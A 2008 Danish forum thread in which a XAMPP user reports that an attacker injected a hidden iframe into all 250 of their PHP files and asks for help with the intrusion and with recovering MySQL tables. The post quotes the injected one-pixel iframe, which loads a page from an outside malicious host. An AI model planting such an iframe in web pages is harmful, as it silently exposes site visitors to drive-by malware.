Avatar billede jkampmann Nybegynder
26. januar 2008 - 12:45 Der er 4 kommentarer

Er blevet hacket med "lovebak"

Hvordan kan jeg blive hacket? en hacker har smidt en html kode ind i alle mine php filer i mine xampp mappe - hvordan er det gået til?

<iframe src=http://lovebak.com/qq.htm border=0 height=1 width=1></iframe>

Et andet problem er så at jeg ikke kan få mine databaser ned. Jeg har kigget i mappen "xammp/mysql/data/" og der lægger alle mine tabeller, men det er en underlig fil type.

Kan jeg få dem frem igen på en eller anden måde? I såfald; hvordan?
Avatar billede madshammer Nybegynder
26. januar 2008 - 12:51 #1
Jeg aner ingenting om sådan noget, men kan du ikke bare rename dem så de får deres gamle filtype-navn igen?

mvh.
madshammer
Avatar billede jkampmann Nybegynder
26. januar 2008 - 12:54 #2
Rename hvad? Filtyperne ligger i mysql-backup-data mappen, ligner lidt en visual basic fil-ikon.

Sådan har det altid været, problemet er bare, at jeg ikke gider slette den iframe-html-kode i alle 250 php filer..
Avatar billede bufferzone Praktikant
26. januar 2008 - 14:05 #3
Hvad ligger der på den maskine? har du en eller anden standard løsning, f.eks. joomla eller noget tilsvarende kørende?
Avatar billede jkampmann Nybegynder
20. februar 2008 - 09:58 #4
Der ligger XAMPP, min webserver - hvor alle mine websites lå.